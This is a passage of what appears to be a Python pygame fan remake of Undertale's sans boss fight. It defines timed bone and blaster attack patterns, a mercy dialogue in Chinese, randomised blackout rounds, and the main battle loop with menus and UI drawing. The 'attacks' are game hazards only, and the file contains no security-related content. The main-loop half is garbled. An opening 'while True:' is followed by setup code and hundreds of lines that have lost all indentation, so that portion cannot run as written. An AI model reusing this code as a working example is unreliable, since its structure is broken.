    tasks.append(Task(shake,
        (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
    tasks.append(Task(unshake,
        ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))
    tasks.append(Task(lambda screen : slam_sound.play(),
        (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
@add_attack
def board_2_2():
    """Second platform phase: two timed floor blasters, four boards of varying
    speed/length gliding in from the right, over a spiked floor that appears
    in two waves."""
    set_turn_time(600)
    tasks.append(Task(shake, 70))
    tasks.append(Task(unshake, 75))
    # First floor blaster at tick ~70.
    blasters.append(
        GasterBlaster(
            pos=[10, BOX_POS[1] + BOX_SIZE[1]],
            angle=0,
            time1=10,
            time2=70,
            time3=10,
            width=70
        )
    )
    tasks.append(Task(shake, 250))
    tasks.append(Task(unshake, 255))
    # Second, slightly higher blaster delayed to tick ~250 (time3=250).
    blasters.append(
        GasterBlaster(
            pos=[10, BOX_POS[1] + BOX_SIZE[1] - 20],
            angle=0,
            time1=10,
            time2=70,
            time3=250,
            width=70
        )
    )
    # Boards entering from the right edge at staggered times and speeds.
    boards.append(
        Board(
            pos=[BOX_POS[0] + BOX_SIZE[0],
                BOX_POS[1] + BOX_SIZE[1] - 30 - 10],
            time1=1000,
            time2=0,
            speed=[-2, 0],
            length=40
        )
    )
    boards.append(
        Board(
            pos=[BOX_POS[0] + BOX_SIZE[0],
                BOX_POS[1] + BOX_SIZE[1] - 30 - 10],
            time1=1000,
            time2=100,
            speed=[-1.5, 0],
            length=40
        )
    )
    boards.append(
        Board(
            pos=[BOX_POS[0] + BOX_SIZE[0],
                BOX_POS[1] + BOX_SIZE[1] - 30 - 10],
            time1=1000,
            time2=200,
            speed=[-1, 0],
            length=40
        )
    )
    boards.append(
        Board(
            pos=[BOX_POS[0] + BOX_SIZE[0],
                BOX_POS[1] + BOX_SIZE[1] - 30 - 30],
            time1=1000,
            time2=300,
            speed=[-3, 0],
            length=80
        )
    )
    # Spiked floor: a 400-tick wave at tick 100, then a lasting one at 500.
    for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):
        bones.append(
            Bone(
                pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30],
                length=1000,
                direction=UP,
                time1=400,
                time2=100,
                speed=[0, 0],
                type_=1
            )
        )
        bones.append(
            Bone(
                pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30],
                length=1000,
                direction=UP,
                time1=1000,
                time2=500,
                speed=[0, 0],
                type_=1
            )
        )
players_turn("* ...")
@add_attack
def bone_lid1():
    """Slam the soul down, then two angled bones scissor inward along the
    floor from both sides like a closing lid."""
    set_turn_time(70)
    global BOX_SIZE, BOX_POS
    BOX_POS = [200, 240]
    BOX_SIZE = [200, 150]
    sans.hand_direction = DOWN
    player.type = BLUE_SOUL
    player.direction = DOWN
    player.falling_speed = 10
    tasks.append(Task(shake,
        (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
    tasks.append(Task(unshake,
        ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))
    tasks.append(Task(lambda screen : slam_sound.play(),
        (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
    # Mirrored ±45° bones converging along the bottom edge.
    bones.append(
        RotatableBone(
            pos=[BOX_POS[0] - 70, BOX_POS[1] + BOX_SIZE[1]],
            time1=1000,
            length=130,
            angle=45,
            speed=[5, 0, 0, 0]
        )
    )
    bones.append(
        RotatableBone(
            pos=[BOX_POS[0] + BOX_SIZE[0] + 70, BOX_POS[1] + BOX_SIZE[1]],
            time1=1000,
            length=130,
            angle=-45,
            speed=[-5, 0, 0, 0]
        )
    )
@add_attack
def bone_lid2():
    """Mirror of bone_lid1: slam the soul UP, then two angled bones scissor
    inward along the ceiling.

    Fix: the slam sound was timed with the downward-slam formula
    ``(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10`` although this slam is
    upward; it now uses the same delay as the shake so sound and impact
    coincide.
    """
    set_turn_time(60)
    sans.hand_direction = UP
    player.type = BLUE_SOUL
    player.direction = UP
    player.falling_speed = 10
    player.falling = True
    # Effects timed to the end of the upward fall (distance / 10 px per tick).
    tasks.append(Task(shake,
        (player.pos[1] - BOX_POS[1]) // 10))
    tasks.append(Task(unshake,
        ((player.pos[1] - BOX_POS[1]) // 10) + 5))
    tasks.append(Task(lambda screen : slam_sound.play(),
        (player.pos[1] - BOX_POS[1]) // 10))
    # Mirrored ∓45° bones converging along the top edge.
    bones.append(
        RotatableBone(
            pos=[BOX_POS[0] - 20, BOX_POS[1]],
            time1=1000,
            length=130,
            angle=-45,
            speed=[5, 0, 0, 0]
        )
    )
    bones.append(
        RotatableBone(
            pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[1]],
            time1=1000,
            length=130,
            angle=45,
            speed=[-5, 0, 0, 0]
        )
    )
@add_attack
def bone_lid3():
    """Red-soul phase: for 20 rounds, long ±45° bones slide vertically through
    the box from all four corners in alternating half-cycles."""
    set_turn_time(1300)
    player.type = RED_SOUL
    for _ in range(20):
        # Left-corner pair (top sliding down, bottom sliding up).
        bones.append(
            RotatableBone(
                pos=[BOX_POS[0], BOX_POS[1] - 20],
                time1=1000,
                time2=_ * 60,
                length=260,
                angle=-45,
                speed=[0, 2, 0, 0]
            )
        )
        bones.append(
            RotatableBone(
                pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] + 20],
                time1=1000,
                time2=_ * 60,
                length=260,
                angle=45,
                speed=[0, -2, 0, 0]
            )
        )
        # Right-corner pair, offset half a cycle (30 ticks) later.
        bones.append(
            RotatableBone(
                pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 20],
                time1=1000,
                time2=_ * 60 + 30,
                length=260,
                angle=45,
                speed=[0, 2, 0, 0]
            )
        )
        bones.append(
            RotatableBone(
                pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] + BOX_SIZE[1] + 20],
                time1=1000,
                time2=_ * 60 + 30,
                length=260,
                angle=-45,
                speed=[0, -2, 0, 0]
            )
        )
players_turn("* ...")
@add_attack
def mercy1():
    """Start of the mercy dialogue: pause the music and offer a break.
    (Line: "alright, I'm tired too — how about a rest?")"""
    pygame.mixer.music.pause()
    sans.say("好了,我也累了,不如我们休息一下?")
@add_attack
def mercy2():
    """Mercy dialogue, part 2. (Line: "this is also a chance to turn over a
    new leaf,")"""
    sans.say("这也是一个改过自新的机会,")
@add_attack
def mercy3():
    """Mercy dialogue, part 3. (Line: "hurry up and press MERCY,")"""
    sans.say("赶紧按下饶恕,")
@add_attack
def mercy4():
    """Mercy dialogue, part 4 — empty-eyed threat. (Line: "otherwise you
    really don't want to see the next round")"""
    sans.headtype = SANS_NO_EYES
    sans.say("否则你绝对不想见到下一个回合")
@add_attack
def mercy5():
    """End the mercy beat: restore sans' face and return control immediately."""
    set_turn_time(0)
    sans.headtype = SANS_NORMAL
players_turn("* ...")
@add_attack
def before_flash():
    """Lead-in to the blackout rounds. (Line: "well, looks like you've made
    your choice.")"""
    sans.say("好吧,看来你已经做出了自己的选择。")
@add_attack
def flash_round():
    """Blackout transition: flash, hide the screen, wipe all projectiles,
    then flash back 10 ticks later and resume the music. Queued between each
    randomly chosen flash_round_N phase."""
    set_turn_time(10)
    global blackout
    flash_sound.play()
    blackout = True
    bones.clear()
    blasters.clear()
    boards.clear()
    def flash(screen):
        # Restore the screen and audio once the new phase has been staged.
        global blackout
        blackout = False
        flash_sound.play()
        pygame.mixer.music.unpause()
    tasks.append(Task(flash, 10))
def flash_round_1():
    """Blackout phase: drop the blue soul from far above into a ring of
    bones; blasters rake the box in a randomly mirrored order."""
    set_turn_time(150)
    global _boxsize, _boxpos, BOX_POS, BOX_SIZE
    player.type = BLUE_SOUL
    player.direction = DOWN
    BOX_SIZE = _boxsize = [150, 150]
    BOX_POS = _boxpos = [230, 230]
    # Spawn far above the box so the player falls in during the flash.
    player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
                  100000]
    # Coin flip deciding which vertical blaster fires first.
    direction = random.randint(0, 1)
    blasters.append(
        GasterBlaster(
            pos=[BOX_POS[0] - 30, BOX_POS[1] + BOX_SIZE[1] - 30],
            angle=0,
            time1=0,
            time2=30,
            time3=10,
            width=90
        )
    )
    blasters.append(
        GasterBlaster(
            pos=[BOX_POS[0] - 30, BOX_POS[1] - 30],
            angle=0,
            time1=0,
            time2=30,
            time3=60,
            width=90
        )
    )
    if direction:
        blasters.append(
            GasterBlaster(
                pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 30],
                angle=90,
                time1=0,
                time2=30,
                time3=10,
                width=90
            )
        )
        blasters.append(
            GasterBlaster(
                pos=[BOX_POS[0], BOX_POS[1] - 30],
                angle=90,
                time1=0,
                time2=30,
                time3=60,
                width=90
            )
        )
    else:
        blasters.append(
            GasterBlaster(
                pos=[BOX_POS[0], BOX_POS[1] - 30],
                angle=90,
                time1=0,
                time2=30,
                time3=10,
                width=90
            )
        )
        blasters.append(
            GasterBlaster(
                pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 30],
                angle=90,
                time1=0,
                time2=30,
                time3=60,
                width=90
            )
        )
    # Ring of short bones around the box centre; every 30° one extra bone
    # grows outward from the middle (speed index 3 = growth).
    for angle in range(0, 360, 10):
        bones.append(RotatableBone(
            pos=[BOX_POS[0] + BOX_SIZE[0] / 2 + cos(radians(angle)) * BOX_SIZE[0] / 2,
                 BOX_POS[1] + BOX_SIZE[1] / 2 + 25 + sin(radians(angle)) * BOX_SIZE[1] / 2],
            length=25,
            angle=angle,
            time1=150
        )
        )
        if angle % 30 == 0:
            bones.append(RotatableBone(
                pos=[BOX_POS[0] + BOX_SIZE[0] / 2,
                     BOX_POS[1] + BOX_SIZE[1] / 2 + 25],
                length=40,
                angle=angle,
                speed=[0, 0, 0, 5],
                time1=130,
                time2=20
            )
            )
def flash_round_2():
    """Blackout phase: rain blasters at the player from random points on an
    arc above, one spawn every half tick."""
    set_turn_time(100)
    global _boxsize, _boxpos, BOX_POS, BOX_SIZE
    BOX_SIZE = _boxsize = [150, 150]
    BOX_POS = _boxpos = [230, 230]
    player.type = RED_SOUL
    player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
                  BOX_POS[1] + BOX_SIZE[1] / 2]
    def spawn_blaster(screen):
        # Random point on an upward arc around the player, aimed back at them.
        theta = random.randint(-140, -40)
        dist = random.randint(10, 200)
        blasters.append(GasterBlaster(
            pos=[player.pos[0] + math.cos(math.radians(theta)) * dist,
                 player.pos[1] + math.sin(math.radians(theta)) * dist],
            angle=theta - 180,
            time1=0,
            time2=20,
            width=50
        ))
    tasks.extend(Task(spawn_blaster, tick / 2) for tick in range(50))
def flash_round_3():
    """Blackout phase: a vertical and a horizontal blaster cross at the box
    centre (player spawns exactly on the crossing point)."""
    set_turn_time(100)
    global _boxsize, _boxpos, BOX_POS, BOX_SIZE
    BOX_SIZE = _boxsize = [150, 150]
    BOX_POS = _boxpos = [200, 230]
    player.type = RED_SOUL
    player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
                  BOX_POS[1] + BOX_SIZE[1] / 2]
    blasters.append(
        GasterBlaster(
            pos=[BOX_POS[0] + BOX_SIZE[0] / 2, 50],
            angle=90,
            time1=10,
            time2=70,
            time3=0,
            width=60
        )
    )
    blasters.append(
        GasterBlaster(
            pos=[50, BOX_POS[1] + BOX_SIZE[1] / 2],
            angle=0,
            time1=10,
            time2=70,
            time3=0,
            width=60
        )
    )
def flash_round_4():
    """Blackout phase: two diagonal (±45°) blasters fired from the left
    corners across the box."""
    set_turn_time(100)
    global _boxsize, _boxpos, BOX_POS, BOX_SIZE
    BOX_SIZE = _boxsize = [150, 150]
    BOX_POS = _boxpos = [230, 230]
    player.type = RED_SOUL
    player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
                  BOX_POS[1] + BOX_SIZE[1] / 2]
    blasters.append(
        GasterBlaster(
            pos=[BOX_POS[0] - 10, BOX_POS[1] - 10],
            angle=45,
            time1=10,
            time2=70,
            time3=0,
            width=60
        )
    )
    blasters.append(
        GasterBlaster(
            pos=[BOX_POS[0] - 10, BOX_POS[1] + BOX_SIZE[1] + 10],
            angle=-45,
            time1=10,
            time2=70,
            time3=0,
            width=60
        )
    )
def flash_round_5():
    """Blackout phase: vertical blasters down both box edges plus a wide
    horizontal blaster across the UPPER half (cf. flash_round_6, lower half)."""
    set_turn_time(100)
    global _boxsize, _boxpos, BOX_POS, BOX_SIZE
    BOX_SIZE = _boxsize = [150, 150]
    BOX_POS = _boxpos = [230, 230]
    player.type = RED_SOUL
    player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
                  BOX_POS[1] + BOX_SIZE[1] / 2]
    blasters.append(
        GasterBlaster(
            pos=[BOX_POS[0], 50],
            angle=90,
            time1=10,
            time2=70,
            time3=0,
            width=60
        )
    )
    blasters.append(
        GasterBlaster(
            pos=[BOX_POS[0] + BOX_SIZE[0], 50],
            angle=90,
            time1=10,
            time2=70,
            time3=0,
            width=60
        )
    )
    blasters.append(
        GasterBlaster(
            pos=[50, BOX_POS[1] + 50],
            angle=0,
            time1=10,
            time2=70,
            time3=0,
            width=100
        )
    )
def flash_round_6():
    """Blackout phase: same as flash_round_5 but the wide horizontal blaster
    covers the LOWER half of the box."""
    set_turn_time(100)
    global _boxsize, _boxpos, BOX_POS, BOX_SIZE
    BOX_SIZE = _boxsize = [150, 150]
    BOX_POS = _boxpos = [230, 230]
    player.type = RED_SOUL
    player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
                  BOX_POS[1] + BOX_SIZE[1] / 2]
    blasters.append(
        GasterBlaster(
            pos=[BOX_POS[0], 50],
            angle=90,
            time1=10,
            time2=70,
            time3=0,
            width=60
        )
    )
    blasters.append(
        GasterBlaster(
            pos=[BOX_POS[0] + BOX_SIZE[0], 50],
            angle=90,
            time1=10,
            time2=70,
            time3=0,
            width=60
        )
    )
    blasters.append(
        GasterBlaster(
            pos=[50, BOX_POS[1] + BOX_SIZE[1] - 50],
            angle=0,
            time1=10,
            time2=70,
            time3=0,
            width=100
        )
    )
def flash_round_7():
    """Blackout phase: three waves of slightly tilted (±20°) bones slide
    vertically through the box from all four corners, right side half a wave
    behind the left."""
    set_turn_time(150)
    global BOX_SIZE, BOX_POS, _boxpos, _boxsize
    BOX_POS = _boxpos = [230, 230]
    BOX_SIZE = _boxsize = [150, 150]
    player.type = RED_SOUL
    player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
                  BOX_POS[1] + BOX_SIZE[1] / 2]
    for _ in range(3):
        bones.append(
            RotatableBone(
                pos=[BOX_POS[0], BOX_POS[1] - 20],
                time1=1000,
                time2=_ * 50 + 20,
                length=150,
                angle=-20,
                speed=[0, 4, 0, 0]
            )
        )
        bones.append(
            RotatableBone(
                pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] + 20],
                time1=1000,
                time2=_ * 50 + 20,
                length=150,
                angle=20,
                speed=[0, -4, 0, 0]
            )
        )
        bones.append(
            RotatableBone(
                pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 20],
                time1=1000,
                time2=_ * 50 + 50,
                length=150,
                angle=20,
                speed=[0, 4, 0, 0]
            )
        )
        bones.append(
            RotatableBone(
                pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] + BOX_SIZE[1] + 20],
                time1=1000,
                time2=_ * 50 + 50,
                length=150,
                angle=-20,
                speed=[0, -4, 0, 0]
            )
        )
# Queue five randomly chosen blackout phases, each followed by the
# blackout transition that wipes the field.
random_attacks = [flash_round_1, flash_round_2, flash_round_3,
                  flash_round_4, flash_round_5, flash_round_6,
                  flash_round_7]
for _ in range(5):
    attacks.append(random.choice(random_attacks))
    attacks.append(flash_round)
players_turn("* ...")
@add_attack
def windmill():
    """Four-armed blaster windmill rotating around the box centre; during this
    phase a FIGHT strike only deals 1 damage (before_strike override)."""
    set_turn_time(1200)
    global BOX_POS, BOX_SIZE, before_strike, after_strike
    def before_strike():
        # Cap the player's hit to 1 damage while the windmill spins.
        global sans_damage
        sans_damage = 1
    after_strike = lambda : ...
    BOX_POS = [150, 240]
    BOX_SIZE = [150, 150]
    def movegb(screen):
        # Advance each of the four windmill blasters by 1 degree.
        # NOTE(review): assumes blasters[0:4] are exactly the four appended
        # below (the transition cleared the list) — verify if reordered.
        for i in range(4):
            blasters[i].angle += 1
            blasters[i].end_angle += 1
            blasters[i].radian += radians(-1)
            blasters[i].back_speed = 0
    # Five full rotations, one degree every 0.4 ticks, starting at tick 100.
    for angle in range(360 * 5):
        tasks.append(Task(movegb, angle * 0.4 + 100))
    def enablerecoil(screen):
        for b in blasters:
            b.norecoil = False
    tasks.append(Task(enablerecoil, 800))
    # The four arms, 90° apart, anchored at the box centre.
    for angle in range(0, 360, 90):
        blasters.append(GasterBlaster(
            pos=[150 + 150 / 2, 240 + 150 / 2],
            angle=angle,
            time1=10,
            time2=1000,
            width=30,
            time3=0,
            norecoil=True
        ))
players_turn("* ...")
@add_attack
def gameend():
    """Final queued turn — intentionally empty placeholder (no scripted
    ending; the main loop exits once the attack queue is exhausted)."""
    ...
# ------------------------------------
"""主程序"""
while True:
# ---------------------------------------------------------
'''实例化'''
from locals_ import *
time = 0
_boxpos = [0, 0]
_boxsize = SCREEN_SIZE[:]
rightdown = SCREEN_SIZE[:]
time1 = 0
time2 = 0
delta = 1
blasters = []
bones = []
tasks = []
warns = []
texts = []
boards = []
before_strike = None
after_strike = None
sans = Sans([280, 80])
player = Player([0, 0])
actions = {
"* check" : CHECK_SANS,
"* heal ({} time(s) left)" : HEAL_SANS
}
mc_actions = {
"* spare" : MERCY_SANS_SPARE,
"* flee" : MERCY_SANS_FLEE
}
pygame.mixer.music.stop()
if FULL_SCREEN:
display = pygame.display.set_mode((1920, 1080), FULLSCREEN)
else:
display = pygame.display.set_mode(SCREEN_SIZE)
while True:
time1 = time_.time()
# 屏幕震动
if screen_shaking:
screen_offset[0] = random.randint(-5, 5)
screen_offset[1] = random.randint(-5, 5)
else:
screen_offset = [0, 0]
# 屏幕旋转
if spinning_left:
screen_angle -= 1
# 屏幕旋转
if spinning_right:
screen_angle += 1
# 测试区
if DEBUG:...
# 战斗框位移
if _boxpos[0] != BOX_POS[0]:
if abs(BOX_POS[0] - _boxpos[0]) < 0.1:
_boxpos[0] = BOX_POS[0]
else:
_boxpos[0] += (BOX_POS[0] - _boxpos[0]) / 5
if _boxpos[1] != BOX_POS[1]:
if abs(BOX_POS[1] - _boxpos[1]) < 0.1:
_boxpos[1] = BOX_POS[1]
else:
_boxpos[1] += (BOX_POS[1] - _boxpos[1]) / 5
# 战斗框大小
if rightdown[0] != BOX_POS[0] + BOX_SIZE[0]:
if abs(BOX_POS[0] + BOX_SIZE[0] - rightdown[0]) < 0.1:
rightdown[0] = BOX_POS[0] + BOX_SIZE[0]
else:
rightdown[0] += (BOX_POS[0] + BOX_SIZE[0] - rightdown[0]) / 5
if rightdown[1] != BOX_POS[1] + BOX_SIZE[1]:
if abs(BOX_POS[1] + BOX_SIZE[1] - rightdown[1]) < 0.1:
rightdown[1] = BOX_POS[1] + BOX_SIZE[1]
else:
rightdown[1] += (BOX_POS[1] + BOX_SIZE[1] - rightdown[1]) / 5
_boxsize = [
rightdown[0] - _boxpos[0],
rightdown[1] - _boxpos[1]
]
if time >= len(attacks):
exit()
if not stop and not is_players_turn:
attacks[time]()
time += 1
stop = True
screen.fill((0, 0, 0, 255))
display.fill((0, 0, 0))
mask_surface_blue.fill((0, 0, 0, 0))
mask_surface_orange.fill((0, 0, 0, 0))
mask_surface_normal.fill((0, 0, 0, 0))
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
exit()
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
pygame.quit()
exit()
if event.key in (K_z, K_RETURN):
if sans.show_index >= len(sans.text) and sans.show_text == True:
sans.show_text = False
stop = False
elif page in (CHECK_SANS, HEAL_SANS, HEAL_SANS_CANT) and shown_index >= len(battle_text):
is_players_turn = False
stop = False
page = MAIN_PAGE
player.pos = [
BOX_POS[0] + BOX_SIZE[0] / 2,
BOX_POS[1] + BOX_SIZE[1] / 2
]
player.select_sound.play()
else:
player.choose = is_players_turn
if is_players_turn and page != FIGHT_SANS:
player.select_sound.play()
if event.key in (K_x, K_RSHIFT):
sans.show_index = len(sans.text)
shown_index = len(battle_text)
player.back = True
player.choice = 0
if event.key == K_UP:
player.going_up = True
if event.key == K_DOWN:
player.going_down = True
if event.key == K_LEFT:
player.going_left = True
if event.key == K_RIGHT:
player.going_right = True
if event.key == K_F4:
if FULL_SCREEN:
display = pygame.display.set_mode(SCREEN_SIZE)
FULL_SCREEN = 0
else:
display = pygame.display.set_mode((1920, 1080), FULLSCREEN)
FULL_SCREEN = 1
if event.key == K_F2:
restarting = True
if DEBUG:
if event.key == K_n:
bones.clear()
boards.clear()
blasters.clear()
stop = False
if event.key == K_EQUALS:
frames += 1
if event.key == K_MINUS:
frames -= 1
if event.type == KEYUP:
if event.key == K_UP:
player.going_up = False
if event.key == K_DOWN:
player.going_down = False
if event.key == K_LEFT:
player.going_left = False
if event.key == K_RIGHT:
player.going_right = False
if event.key == K_ESCAPE:
pygame.quit()
exit()
if event.key in (K_z, K_RETURN):
player.choose = False
if event.key in (K_x, K_RSHIFT):
player.back = False
'''检测&更新'''
# 战斗框
pygame.draw.rect(screen, (255, 255, 255, 255), pygame.Rect((_boxpos[0] - 5, _boxpos[1] - 5),
(_boxsize[0] + 10, _boxsize[1] + 10)))
pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect(_boxpos, _boxsize)) # 内遮挡
# 骨头
for b in bones:
b.show(screen,
mask_surface_blue,
mask_surface_orange,
mask_surface_normal)
if b.stop:
bones.remove(b)
# 警告框
for w in warns:
w.show(screen)
if w.stop:
warns.remove(w)
# 板子
for b in boards:
b.show(screen)
if b.stop:
boards.remove(b)
if b.rect.colliderect(player.rect) and player.falling:
player.pos[0] += b.speed[0]
player.pos[1] += b.speed[1]
if player.direction == DOWN:
player.pos[1] = b.rect.top - 7
elif player.direction == UP:
player.pos[1] = b.rect.bottom - 1
elif player.direction == RIGHT:
player.pos[0] = b.rect.left - 7
elif player.direction == LEFT:
player.pos[0] = b.rect.right - 1
player.falling = False
"""外遮挡"""
pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((0, 0), (SCREEN_SIZE[0], _boxpos[1] - 5)))
pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((0, _boxpos[1] - 5), (_boxpos[0] - 5, _boxsize[1] + 10)))
pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((0, _boxpos[1] + _boxsize[1] + 5),
(SCREEN_SIZE[0], SCREEN_SIZE[1] - (_boxpos[1] + _boxsize[1]) - 5)))
pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((_boxpos[0] + _boxsize[0] + 5, _boxpos[1] - 5),
(SCREEN_SIZE[0] - (_boxpos[0] + _boxsize[0]) - 5, _boxsize[1] + 10)))
'''显示UI(外面)'''
pygame.draw.rect(screen, (191, 0, 0, 255), pygame.Rect((275, 400), (92, 20)))
if player.KR:
pygame.draw.rect(screen, (255, 0, 255, 255), pygame.Rect((275 + player.HP, 400), (round(player.KR), 20)))
pygame.draw.rect(screen, (255, 255, 0, 255), pygame.Rect((275, 400), (player.HP, 20)))
screen.blit(
font2.render(
"{:0>2.0f} / 92".format(player.HP + player.KR),
True,
(255, 255, 255) if not round(player.KR) else (255, 0, 255)
),
(
415,
400
)
)
screen.blit(hp_image, (240, 405))
screen.blit(kr_image, (375, 405))
screen.blit(
font2.render(
"Chara LV 19", True, (255, 255, 255)
), (30, 400)
)
# 显示文本
for text in texts:
screen.blit(
font.render(
text[1], True, (255, 255, 255)
), text[0]
)
if DEBUG:
screen.blit(
font2.render(
"DEBUG", True, (0, 0, 255)
), (200, 0)
)
# 显示帧数
screen.blit(
font2.render(
"FPS:{:0>3d}".format(round(1 / delta)), True, (0, 0, 255)
), (0, 0)
)
if fight:
screen.blit(fight_highlight_image, fight_pos)
else:
screen.blit(fight_default_image, fight_pos)
if act:
screen.blit(act_highlight_image, act_pos)
else:
screen.blit(act_default_image, act_pos)
if item:
screen.blit(item_highlight_image, item_pos)
else:
screen.blit(item_default_image, item_pos)
if mercy:
screen.blit(mercy_highlight_image, mercy_pos)
else:
screen.blit(mercy_default_image, mercy_pos)
# 鳝丝(要放在外面)
sans.show(screen)
if show_sans_damage:
if sans_damage == MISS:
screen.blit(miss_image, (250, 60))
# GB炮(要放在外面)
for t in blasters:
t.show(screen,
mask_surface_blue,
mask_surface_orange,
mask_surface_normal)
if t.stop:
blasters.remove(t)
# 其他东西,blahblahblah(外面)
for t in tasks:
t.show(screen)
if t.stop:
tasks.remove(t)
if is_players_turn: # 玩家回合
BOX_POS = [30, 250]
BOX_SIZE = [570, 130]
if page == MAIN_PAGE:
if shown_index < len(battle_text):
shown_index += 1
text_sound.play()
x = 40
y = 250
for char in battle_text[:shown_index]:
if char != '\n':
screen.blit(
battle_font.render(char, True, (255, 255, 255)),
(x, y)
)
x += 12
if x > BOX_POS[0] + BOX_SIZE[0] or char == "\n":
y += 16
x = 40
player.type = CURSOR_SOUL
player.options = (
(fight_pos[0] + 10, fight_pos[1] + 15),
( act_pos[0] + 10, act_pos[1] + 15),
( item_pos[0] + 10, item_pos[1] + 15),
(mercy_pos[0] + 10, mercy_pos[1] + 15)
)
if player.choice == 0:
fight = True
act = False
item = False
mercy = False
if player.choice == 1:
fight = False
act = True
item = False
mercy = False
if player.choice == 2:
fight = False
act = False
item = True
mercy = False
if player.choice == 3:
fight = False
act = False
item = False
mercy = True
if player.choose:
page = [FIGHT, ACT, 0, MERCY][player.choice]
player.choose = False
player.choice = 0
fight = False
act = False
item = False
mercy = False
if page == ACT:
player.options = [(40, 255)]
screen.blit(
battle_font.render("* sans", True, (255, 255, 255)),
(40, 250)
)
if player.choose:
page = [ACT_SANS][player.choice]
player.choose = False
player.choice = 0
if player.back:
page = MAIN_PAGE
if page == ACT_SANS:
player.options = []
y = 250
for _ in actions.keys():
if actions[_] == HEAL_SANS:
_ = _.format(heal_times_left)
screen.blit(
battle_font.render(_, True, (255, 255, 255)),
(40, y)
)
player.options.append((40, y + 5))
y += 20
if player.choose:
page = list(actions.values())[player.choice]
if page == HEAL_SANS:
if heal_times_left > 0:
heal(player, 92)
heal_times_left -= 1
else:
page = HEAL_SANS_CANT
player.choose = False
player.choice = 0
if player.back:
page = ACT
if page == CHECK_SANS:
player.type = RED_SOUL
player.pos = [
-100,
-100
]
battle_text = "* Sans\n The TRUE HERO.\n ATK:1\n DEF:1\n Nothing to say."
if shown_index < len(battle_text):
shown_index += 1
text_sound.play()
x = 40
y = 250
for char in battle_text[:shown_index]:
if char != '\n':
screen.blit(
battle_font.render(char, True, (255, 255, 255)),
(x, y)
)
x += 12
if x > BOX_POS[0] + BOX_SIZE[0] or char == "\n":
y += 20
x = 40
if page == HEAL_SANS:
player.type = RED_SOUL
player.pos = [
-100,
-100
]
battle_text = "* You are healthy again now.\n* {} time(s) left.".format(heal_times_left)
if shown_index < len(battle_text):
shown_index += 1
text_sound.play()
x = 40
y = 250
for char in battle_text[:shown_index]:
if char != '\n':
screen.blit(
battle_font.render(char, True, (255, 255, 255)),
(x, y)
)
x += 12
if x > BOX_POS[0] + BOX_SIZE[0] or char == "\n":
y += 20
x = 40
if page == HEAL_SANS_CANT:
player.type = RED_SOUL
player.pos = [
-100,
-100
]
battle_text = "* No more times for you to heal!"
if shown_index < len(battle_text):
shown_index += 1
text_sound.play()
x = 40
y = 250
for char in battle_text[:shown_index]:
if char != '\n':
screen.blit(
battle_font.render(char, True, (255, 255, 255)),
(x, y)
)
x += 12
if x > BOX_POS[0] + BOX_SIZE[0] or char == "\n":
y += 20
x = 40
if page == FIGHT:
player.options = [(40, 255)]
screen.blit(
battle_font.render("* sans", True, (255, 255, 255)),
(40, 250)
)
if player.choose:
page = [FIGHT_SANS][player.choice]
player.choose = False
player.choice = 0
choice_pos = [50, 250]
if player.back:
page = MAIN_PAGE
if page == FIGHT_SANS:
player.type = RED_SOUL
player.pos = [
-100,
-100
]
target_img.set_alpha(target_alpha)
if not choice_blink:
if target_alpha >= 255:
choice_going = True
else:
target_alpha += 10
screen.blit(target_img, [BOX_POS[0] + 10, BOX_POS[1] + 5])
screen.blit([choice_img, choice_blink_img][choice_ani_index // 5 % 2], choice_pos)
choice_ani_index += choice_blink
choice_pos[0] += choice_going * 8
if choice_going and (player.choose or choice_pos[0] > BOX_POS[0] + BOX_SIZE[0]):
choice_going = False
choice_blink = True
tasks.append(Strike(sans.pos[:]))
if not before_strike:
sans.target_pos = [100, 80]
else:
before_strike()
if choice_blink:
blink_time += 1
if blink_time > 60:
show_sans_damage = False
choice_going = False
choice_blink = False
choice_ani_index = 0
target_alpha = 0
blink_time = 0
is_players_turn = False
stop = False
page = MAIN_PAGE
if not after_strike:
sans.target_pos = [250, 80]
else:
after_strike()
player.pos = [
BOX_POS[0] + BOX_SIZE[0] / 2,
BOX_POS[1] + BOX_SIZE[1] / 2
]
elif blink_time > 30:
target_alpha -= 10
show_sans_damage = True
if page == MERCY:
player.options = [(40, 255)]
screen.blit(
battle_font.render("* sans", True, (255, 255, 255)),
(40, 250)
)
if player.choose:
page = [MERCY_SANS][player.choice]
player.choose = False
player.choice = 0
if player.back:
page = MAIN_PAGE
if page == MERCY_SANS:
player.options = []
y = 250
for _ in mc_actions.keys():
screen.blit(
battle_font.render(_, True, (255, 255, 255)),
(40, y)
)
player.options.append((40, y + 5))
y += 20
